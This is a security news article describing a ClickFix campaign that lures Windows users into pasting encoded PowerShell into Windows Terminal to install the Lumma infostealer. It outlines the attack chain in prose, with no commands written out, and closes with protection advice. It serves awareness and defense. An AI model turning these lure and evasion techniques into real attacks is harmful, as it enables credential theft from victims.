A new ClickFix campaign is tricking Windows users into launching Windows Terminal and pasting malware that deploys the Lumma infostealer, bypassing security tools by using legitimate administrative software.
Microsoft Threat Intelligence has identified a new variation of the ClickFix scam that's actively targeting Windows users, employing a clever twist on the classic social engineering tactic to distribute the Lumma infostealer malware.
How the scam works
The campaign, which surfaced in February 2026, modifies the traditional ClickFix playbook to evade detection. While previous versions tricked victims into using the Windows Run dialog (Win + R) to paste malicious commands, this new iteration directs users to press Windows + X → I, which launches Windows Terminal.
This subtle change is significant because Windows Terminal is a legitimate administrative tool commonly used by developers and IT professionals. Security tools have become adept at flagging suspicious activity from the Run dialog, but Windows Terminal's everyday use makes malicious activity harder to detect.
The social engineering trap
Victims encounter a web page posing as a verification prompt, CAPTCHA check, or troubleshooting guide. The page instructs them to copy a command and paste it into Windows Terminal, typically framed as something harmless like verifying their connection or fixing an error.
What users actually paste is a heavily encoded PowerShell command that initiates a complex attack chain. In one version, the command unpacks itself and downloads a renamed copy of the 7-Zip archive utility along with a compressed payload. The archive tool then extracts additional components that establish persistence, modify Microsoft Defender exclusions, and begin collecting system and browser data.
The final payload
The attack culminates in deploying Lumma Stealer, a common infostealer that injects itself into Chrome and Edge processes to harvest stored login credentials and other browser data. This malware has become increasingly prevalent in recent months, with attackers leveraging various distribution methods to reach victims.
Alternative infection path
A second infection route uses a similarly encoded command to fetch a batch script that drops a VBScript file. This script executes using built-in Windows utilities, including MSBuild, and employs a technique called "EtherHiding" that leverages cryptocurrency blockchain infrastructure before launching the credential-harvesting routine.
Why this matters
ClickFix campaigns have been circulating for over a year, largely because they exploit the reliable tactic of persuading users to run malicious commands themselves. By disguising instructions as routine verification steps, attackers bypass many traditional security measures.
Microsoft's findings suggest scammers are continuously adapting their methods to stay ahead of security tools. The use of Windows Terminal represents a calculated move to blend malicious activity with legitimate system administration, betting that users will assume commands running in a legitimate terminal window are safe.
Protection recommendations
To protect against these attacks, users should:
- Be extremely cautious about copying and pasting commands from websites, especially those claiming to be verification or troubleshooting steps
- Verify the legitimacy of any technical instructions before executing them
- Keep security software updated and enable real-time protection
- Consider using application allowlisting to prevent unauthorized software execution
The campaign demonstrates how attackers continue to refine social engineering tactics, finding new ways to exploit user trust and legitimate system tools to distribute malware. As these techniques evolve, user awareness remains one of the most critical defenses against such attacks.
Comments
Please log in or register to join the discussion